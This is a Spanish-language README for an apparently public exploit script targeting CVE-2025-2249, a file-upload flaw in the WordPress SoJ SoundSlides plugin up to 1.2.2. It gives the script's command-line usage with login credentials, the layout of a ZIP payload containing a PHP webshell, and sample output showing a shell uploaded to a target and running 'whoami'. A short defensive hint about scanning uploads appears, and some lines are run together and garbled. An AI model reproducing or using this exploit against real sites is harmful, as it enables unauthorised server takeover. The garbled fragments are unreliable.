
El plugin SoJ SoundSlides para WordPress <= 1.2.2 es vulnerable a Subida de Archivos Arbitraria
⚠️ DESCARGO DE RESPONSABILIDAD: Este exploit es solo con fines educativos y de pruebas autorizadas.
El plugin SoJ SoundSlides permite a usuarios autenticados con roles de Contribuidor o superior subir archivos ZIP arbitrarios. Debido a la falta de validación, los atacantes pueden subir webshells PHP que se extraen y ejecutan desde un directorio accesible desde la web.
Un atacante con credenciales válidas de WordPress puede:
?cmd=)usage: CVE-2025-2249.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-2249 | WordPress SoJ SoundSlides Plugin # By Nxploited | Khaled ALenazi,
options:
-h, --help show this help message and exit
-u, --url URL WordPress base URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
| Argumento | Descripción |
|---|---|
-u | URL base de WordPress |
-un | Nombre de usuario de WordPress |
-p | Contraseña de WordPress |
readme.txt del pluginnxploit/
├── index.html
├── data/
│ └── data.xml
├── audio/
│ └── audio.mp3
└── nxploit.php ← PHP shell (?cmd=)
[*] Checking plugin version...
[+] Vulnerable version detected.
[*] Logging in...
[+] Login successful.
[*] Uploading shell...
[*] Shell uploaded: http://target/wp-content/uploads/SoundSlides/nxploit_shell/nxploit.php
> whoami
www-data
wp-content/uploads/ en busca de archivos .php inesperadosConstruido con ❤️ por [Nxploited | Khaled ALenazi]
Para educación, concienciación y defensa.
La seguridad es responsabilidad de todos. Siempre prueba de manera ética, informa de manera responsable y protege la web.